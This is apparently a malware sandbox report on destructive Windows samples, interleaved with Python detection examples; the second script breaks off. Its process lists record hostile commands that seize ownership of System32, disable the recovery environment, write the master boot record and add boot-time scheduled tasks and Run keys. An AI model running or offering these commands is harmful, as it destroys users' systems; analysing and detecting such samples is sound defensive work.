C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\KFOlCnqEu92Fr1MmYUtfBBc9[1].ttf
| MD5 | 4d99b85fa964307056c1410f78f51439 |
| SHA1 | f8e30a1a61011f1ee42435d7e18ba7e21d4ee894 |
| SHA256 | 01027695832f4a3850663c9e798eb03eadfd1462d0b76e7c5ac6465d2d77dbd0 |
| SHA512 | 13d93544b16453fe9ac9fc025c3d4320c1c83a2eca4cd01132ce5c68b12e150bc7d96341f10cbaa2777526cf72b2ca0cd64458b3df1875a184bbb907c5e3d731 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs
| MD5 | 076eec2d750fb2a85461d8b227b96124 |
| SHA1 | d1a6638bc96e6e3adf0ca3e3cb4c846f77e365d8 |
| SHA256 | a596e5753416572e877fe630002dc42afdbfa9ca80473e1385017b37e082a1a4 |
| SHA512 | 5c6ff87335577061483cbf79333728085f198a4ee56fabab7d2fc401cbe8b146ee5ad174a6c1f5ba02095b186bb0f3729a5927b7fda4feeb6f5ae7411fa70ab5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b57bcbd41f0f728925ab0d2a4c38a8ef |
| SHA1 | 5cd0febf6ee1813bde4bc4e465dc28262106111a |
| SHA256 | eb9a72066462a0d4e6238586a9908d404b15ded9b2cdd94f97f00cca56dd0187 |
| SHA512 | e06a9e833bc17decf7ce2f8e191b511d8958299a71dd65444e4fd80c248f77cbee8f4b5a6332ae9f8ad207c10fff3bff2384db0b51dfb132bf8bbbad251791a3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2fc8497a9b508a84e1f92858ff6514fb |
| SHA1 | 31fb0616a3513f86ec9e93e613d40fa41dc0821d |
| SHA256 | 1457d3ec634348488cf9922e934fdd180209653e493c8821475248c1a38a6aed |
| SHA512 | 84cb3a4be945e5927415d9cd1497f322d9aa592574ddcbc797c0e1fd52faaa3fed87a9b1d028f48d520ecbd283205bb11408e77fd80e209a8ca6555a139121bb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416
| MD5 | 55540a230bdab55187a841cfe1aa1545 |
| SHA1 | 363e4734f757bdeb89868efe94907774a327695e |
| SHA256 | d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb |
| SHA512 | c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fa801eae83467e99cbd289126f4e0aba |
| SHA1 | d1fec3e86eaa22790e404ae6c307ed9b462c8472 |
| SHA256 | 65f13070cbdfec30b52e75671a4d8c687d5cf0db9e0266a8362094318bfb5364 |
| SHA512 | 47bb49cec431a4aeb84d2483079366a9afb24a969399b580676feafc168d2c6dc78ee030dca066376ba6de275c541ca1222cf475e0a259acc084e47ff6e0fdf3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a98aea1ab2122bf0d89af982f419892b |
| SHA1 | 2560b555cb4a2e15ef0c7209bdb54f8c84c36852 |
| SHA256 | e9ce612d59468c32fda4599b70ddb567f6ae9d1fdc92c7593f7801e005e92305 |
| SHA512 | b9c907b179a129fbffc77ffce0644b337d1f3ff30e7bd7421c57d3ae0813764ec8693d3e75e15376566250a40622319fe5f7d3a7614b5be74195e95676f70754 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d5495f32463d77ef4e935c7e5b71f986 |
| SHA1 | c213b0924a6a5d634b58360a4971b3fdd9faf762 |
| SHA256 | ffaea1bee1844e84d6f4d9a6ed51003e6ffe24b0d909a13b7e0af656f74f4513 |
| SHA512 | 96158c191b318fe5d67be164c1cbdc5449bf4caa2987eb0c37b149887a5b61272504c1fae081068bd3220ff814b820a9c4daeb44dfaf2e2568c29331ab94750f |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\NDIM7ZER\ww12.thisworldthesedays[1].xml
| MD5 | c1ddea3ef6bbef3e7060a1a9ad89e4c5 |
| SHA1 | 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966 |
| SHA256 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db |
| SHA512 | 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\cb=gapi[1].js
| MD5 | f4ac8ebcddf99f97b1f255e008368d12 |
| SHA1 | f49430105d72515c98afe87a26e66a5249a9a83b |
| SHA256 | 326a0170c1d2759827150de6606cf8a5a4423c9b01748de34e01cee23e523f5d |
| SHA512 | 564b6762d839946687e118a36289328deaf966261e744ed4c08001ca3601b26688ba0d1ef4b260c055e00d3f33df1653d2b51d565d367ee4a384ce9fba45aac5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U8A9A2DI\drive_2020q4_32dp[1].png
| MD5 | 916c9bcccf19525ad9d3cd1514008746 |
| SHA1 | 9ccce6978d2417927b5150ffaac22f907ff27b6e |
| SHA256 | 358e814139d3ed8469b36935a071be6696ccad7dd9bdbfdb80c052b068ae2a50 |
| SHA512 | b73c1a81997abe12dba4ae1fa38f070079448c3798e7161c9262ccba6ee6a91e8a243f0e4888c8aef33ce1cf83818fc44c85ae454a522a079d08121cd8628d00 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\q905y6j\imagestore.dat
| MD5 | daf0fb7d7f678ac0910c33a69b27f1b1 |
| SHA1 | 8f909239197fe716fefb69b06e276a0e2b9fbee0 |
| SHA256 | c73037ecadcb827c19788a70e735e57d3f04241187fad810ccaf090e1d5d640c |
| SHA512 | 2acf94f92b826edf08a2fc9411021af1134a5f546dc011b0d76f2b67adc442b6e9ce0e7c089373bad92e0d28f8df4c2cc71b4969c6c00260564c4f04357bd160 |
Analysis: behavioral19
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
121s
Max time network
134s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\__tmp_rar_sfx_access_check_259411410 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2292 wrote to memory of 2536 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\SystemUpdateInstalled\doom.bat" "
Network
Files
C:\Windows\SystemUpdateInstalled\doom.bat
| MD5 | 87ff7a4be8ba06c3d469b27fc8d665bc |
| SHA1 | 2ddb2e14bb115a85b13cfbe6204a45360c78de04 |
| SHA256 | c5e12fc8cceb6155d5176025c3aeff5e3d8aef8e54e6eabf5af43f19329a634b |
| SHA512 | 38a8d7ccc7f447b9e7b61d7f876a4f6de9782b09d1491e93bd0fcd3e15b6552cd6cfe015b020686eecea14a0951ed392abae55490b55af9c393eb02530632c35 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
113s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows NT 32\MBR.exe | N/A |
| N/A | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files\Windows NT 32\MBR.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\taskkill.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File created | C:\Windows\System32\sfc.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows NT 32\sound.wav | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\MBR.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\lock_files.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe
"C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && reagentc.exe /disable && Exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
C:\Program Files\Windows NT 32\MBR.exe
"C:\Program Files\Windows NT 32\MBR.exe"
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
"C:\Program Files\Windows NT 32\AdStRkJ_sound.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x38c 0x394
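The cmd.exe line in this process list chains takeown and icacls to hand the current user full control of System32 and its drivers directory, then runs `reagentc /disable` to switch off the recovery environment, while the dropped MBR.exe opens PhysicalDrive0 for modification. The Python below is an added example, not part of the sandbox report or of the sample, showing how an analyst can flag that chain from process and file events: it splits the cmd.exe line on its `&&` separators, checks takeown/icacls targets against protected directories, catches the reagentc call, and flags raw-disk opens. The event records are constructed by hand from the tables above; the field names (`image`, `cmdline`, `path`, `op`) and the finding labels are this example's own, not the sandbox's schema.

```python
import re

# Process and file events transcribed from the behavioral6 tables above.
# Constructed records for this example: the sandbox does not emit this shape,
# and no PIDs or timestamps are taken from the report.
PROCESS_EVENTS = [
    {"image": r"C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe"'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": (r'"C:\Windows\System32\cmd.exe" /k color 47 && title Critical process '
                 r'&& takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F '
                 r'&& takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F '
                 r'&& reagentc.exe /disable && Exit')},
    {"image": r"C:\Windows\system32\takeown.exe", "cmdline": r"takeown /f C:\Windows\System32"},
    {"image": r"C:\Windows\system32\icacls.exe", "cmdline": r"icacls C:\Windows\System32 /grant Admin:F"},
    {"image": r"C:\Windows\system32\takeown.exe", "cmdline": r"takeown /f C:\Windows\System32\drivers"},
    {"image": r"C:\Windows\system32\icacls.exe", "cmdline": r"icacls C:\Windows\System32\drivers /grant Admin:F"},
    {"image": r"C:\Windows\system32\ReAgentc.exe", "cmdline": r"reagentc.exe /disable"},
]
FILE_EVENTS = [
    {"image": r"C:\Program Files\Windows NT 32\MBR.exe",
     "path": r"\??\PhysicalDrive0", "op": "open_for_modification"},
]

# Directories whose ACLs no user-level program has business rewriting.
PROTECTED = (r"c:\windows\system32", r"c:\windows\syswow64")
# \??\PhysicalDriveN and \\.\PhysicalDriveN are the raw-disk device paths.
RAW_DISK = re.compile(r"(\\\?\?|\\\\\.)\\physicaldrive\d+")


def _norm_path(p):
    return p.strip('"').lower().rstrip("\\")


def _is_protected(p):
    p = _norm_path(p)
    return any(p == root or p.startswith(root + "\\") for root in PROTECTED)


def _verb(tok):
    """Base name of an image or command token, lowercased, without .exe."""
    name = re.split(r"[\\/]", tok)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def split_chain(cmdline):
    """Split a cmd.exe line on &&, ||, & and | into its sub-commands."""
    return [s for s in re.split(r"\s*(?:&&|\|\||&|\|)\s*", cmdline) if s]


def tokenize(cmd):
    """Windows-style split where a double-quoted run is one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def inspect_command(cmd):
    """Yield (signature, target) findings for one sub-command."""
    toks = tokenize(cmd)
    if len(toks) >= 2 and _verb(toks[0]) == "cmd" and toks[1].lower() in ("/c", "/k"):
        toks = toks[2:]  # unwrap "cmd /k <real command>"
    if not toks:
        return
    verb, args = _verb(toks[0]), toks[1:]
    lowered = [a.lower() for a in args]
    if verb == "takeown" and "/f" in lowered:
        i = lowered.index("/f")
        target = args[i + 1] if i + 1 < len(args) else ""
        if _is_protected(target):
            yield ("Takes ownership of protected directory", _norm_path(target))
    elif verb == "icacls" and args and "/grant" in lowered:
        i = lowered.index("/grant")
        grantee = lowered[i + 1] if i + 1 < len(lowered) else ""
        # %username%:F in the parent and Admin:F in the child are the same grant;
        # cmd.exe expanded the variable before spawning icacls.
        if _is_protected(args[0]) and grantee.endswith(":f"):
            yield ("Grants full control on protected directory", _norm_path(args[0]))
    elif verb == "reagentc" and "/disable" in lowered:
        yield ("Disables Windows Recovery Environment", "reagentc /disable")


def analyze(process_events, file_events):
    """Return the sorted, de-duplicated findings for one detonation."""
    found = set()
    for ev in process_events:
        for sub in split_chain(ev["cmdline"]):
            found.update(inspect_command(sub))
    for ev in file_events:
        if ev["op"] == "open_for_modification" and RAW_DISK.fullmatch(ev["path"].lower()):
            found.add(("Writes to the Master Boot Record (MBR)", ev["path"].lower()))
    return sorted(found)


if __name__ == "__main__":
    for sig, target in analyze(PROCESS_EVENTS, FILE_EVENTS):
        print(f"{sig}: {target}")
```

De-duplicating on (signature, target) matters here: the parent cmd.exe line and the five child processes describe the same five actions, so the chain yields five findings rather than ten, and the raw-disk open from MBR.exe adds a sixth. The same splitter applies to any `cmd /c` or `cmd /k` wrapper the sandbox records.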
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
Files
memory/864-0-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-1-0x000001C250E30000-0x000001C252F90000-memory.dmp
memory/864-2-0x000001C26D560000-0x000001C26D570000-memory.dmp
C:\Program Files\Windows NT 32\lock_files.exe
| MD5 | 7734bece0c7493447d2df4b0a05179d0 |
| SHA1 | f8ab23f32dc38f9ae49e8debb23df5116f8fe6dc |
| SHA256 | 3814d3d7c09d6ad199f43a24ba0b9a831355c3f66bbeb62f9768d995be049593 |
| SHA512 | 88686fa176b439e4c515d453617c47039984c8956be519b410d80d9757c58408f115d57eed0a6b3a14b2d09e4835491d72e5a84abf28e4e7162ef59380dcc385 |
C:\Program Files\Windows NT 32\MBR.exe
| MD5 | a0195c08fbfe459520423bf0a7c20504 |
| SHA1 | 9d62a03597d8c056951e8d377b4db62b51fbbfa3 |
| SHA256 | 95a2cfb0da507b544ae915d6fd2a8d4fd8acb2456310e11d1bc066b531449ea9 |
| SHA512 | 51c9cc7ade18fe5ffd8c58df5f573f625ee6831a8e3d87b8d529ad67a4334a7ca69e311e3a2b93e33b57879c93e20e8d7eef9f3ebc22b55c63f6a7a759bbadc5 |
memory/560-28-0x0000000000400000-0x0000000000433000-memory.dmp
memory/864-29-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-31-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-32-0x000001C26D560000-0x000001C26D570000-memory.dmp
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
| MD5 | 330d74c84f4597a0c7f45b232c7b0ae2 |
| SHA1 | 46d93d7d2907e60c0b5fb3fd7246410c33a591e9 |
| SHA256 | 6b685298579ec278cf041c12ef0ddbc102567ef274bdd43711643da89ba799e1 |
| SHA512 | c88cd6a3e511a76e6baccf9b30ace996689432e335b264996cf6ce3b2f0947515e34151bc620dae1a05d96342be0f856832814a3b7cd5b898b0f8b08ca371814 |
memory/4048-44-0x0000020B7A2E0000-0x0000020B7A308000-memory.dmp
memory/4048-45-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-46-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/4048-47-0x0000020B7A6C0000-0x0000020B7A6D0000-memory.dmp
C:\Program Files\Windows NT 32\sound.wav
| MD5 | 7d2e73f2f72bb20fa52bae59caf5a6bd |
| SHA1 | 62370d4921deb4e5144c6de43c05205df84b04ce |
| SHA256 | 6beb0272ada327dd92f7c3a5c2457325e51b7ac1206a816f1109384807660e38 |
| SHA512 | 8a495d7255628eb91cc8c4b56ebf958075e2831e683a20c9be85a7f5082f1372993ad2bbee9fd61bd408fb74108fa699127ffb894105d7f31fcdc0a0c59a0f62 |
memory/864-49-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-50-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-51-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/4048-52-0x0000020B7C950000-0x0000020B7CAF9000-memory.dmp
memory/864-53-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/4048-55-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-56-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/4048-57-0x0000020B7A6C0000-0x0000020B7A6D0000-memory.dmp
memory/864-58-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-59-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-61-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-62-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-64-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-66-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-68-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-70-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-72-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-74-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-76-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
186s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\mbr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_mbr.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\mbr.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
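This analysis persists in two ways: Run values named `wininit` under the user hive and a `Synaptics Pointing Device Driver` value under HKLM, each pointing at a binary in a user-writable location, plus a scheduled task (the schtasks command line appears in this analysis's process list) that runs `._cache_mbr.exe` as SYSTEM at boot. The Python below is an added example, not from the report or the sample, that parses those indicators and flags autostart entries whose target lives where a standard user can write. The records are transcribed from the tables above with the registry-escaped double backslashes collapsed to single ones; the field names (`op`, `key`, `value`, `image`, `cmdline`) and the finding labels are assumptions of this example, not the sandbox's schema.

```python
import re

# Indicators transcribed from the behavioral22 tables and process list above.
# Constructed records for this example: the sandbox does not emit this shape.
HKCU = r"\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000"
REGISTRY_EVENTS = [
    {"op": "Set value (str)",
     "key": HKCU + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit",
     "value": r"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"},
    {"op": "Set value (str)",  # HKLM write: C:\mbr.exe must already hold admin rights
     "key": r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver",
     "value": r"C:\ProgramData\Synaptics\Synaptics.exe"},
    {"op": "Set value (str)",
     "key": HKCU + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit",
     "value": r"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe"},
]
PROCESS_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART '
                r'/TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"'},
]

# Run/RunOnce under either hive, with or without the WOW6432Node redirection.
RUN_KEY = re.compile(
    r"^\\registry\\(user\\s-1-[\d-]+|machine)\\software\\(?:wow6432node\\)?"
    r"microsoft\\windows\\currentversion\\(run|runonce)\\(.+)$", re.IGNORECASE)
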